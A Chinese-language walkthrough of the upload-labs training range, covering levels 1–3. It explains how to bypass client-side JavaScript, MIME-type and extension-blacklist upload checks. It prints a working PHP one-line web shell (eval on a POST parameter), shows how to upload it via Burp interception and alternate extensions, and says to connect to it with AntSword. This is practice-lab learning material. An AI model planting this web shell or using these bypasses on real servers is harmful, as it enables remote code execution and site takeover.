upload-labs通关攻略教程【1-11关】（持续更新中）

Pass-01-js检查

1. 查看题目源码，发现三种后缀的文件可以上传。
2. 上传一个后缀为.jpg的文件，文件内容为一句话木马<?php @eval($_POST[123]);?>使用burp抓包并修改文件后缀为php，即可上传成功
3. 上传成功使用一句话木马连接即可。
4. 或者直接修改源码删去JS检查的代码，即可将php木马文件直接上传。

Pass-02-MIME验证（content-type验证）

1. 查看题目源码
2. 查看题目提示为MIME验证，分析源码，可以通过burp抓包修改数据包的第二个content-type,并查看响应。

3. 拖拽点击上传成功的图片木马，看到php配置页面即可说明上传成功。
4. 使用上述同样方法上传一句话木马，使用蚁剑连接即可。

Pass-03-黑名单绕过

1. 查看题目源码用黑名单不允许上传.asp,.aspx,.php,.jsp后缀的文件

2. 尝试直接上传一个文件后缀为jpg的一句话木马文件，拖拽点击图片，发现提示错误显示。

3. 基于文件后缀验证名验证方式的分类：
   ①基于白名单验证：只针对白名单中有的后缀名，文件才能上传成功。
   ②基于黑名单验证：只针对黑名单中没有的后缀名，文件才能上传成功。
   用黑名单不允许上传.asp,.aspx,.php,.jsp后缀的文件，但可以上传.phtml、 .php3 .php5、php4、 .pht、php1、php2、phps【这些后缀会被当成php文件解析】等等。
   由于环境是phpstudy搭建，其中限制了后缀，需要在目录D:\PhpStudy2018\PHPTutorial\Apache\conf下将#AddType application/x-httpd-php.php.phtml改为AddType application/x-httpd-php.php.phtml.php3.php4.php5(记得去掉“#”)

4. 上传文件后缀为php3的内容为<?php phpinfo();?>的文件，出现php配置页面即可说明上传成功。

5. 使用上述同样方法上传一句话木马，使用蚁剑连接即可。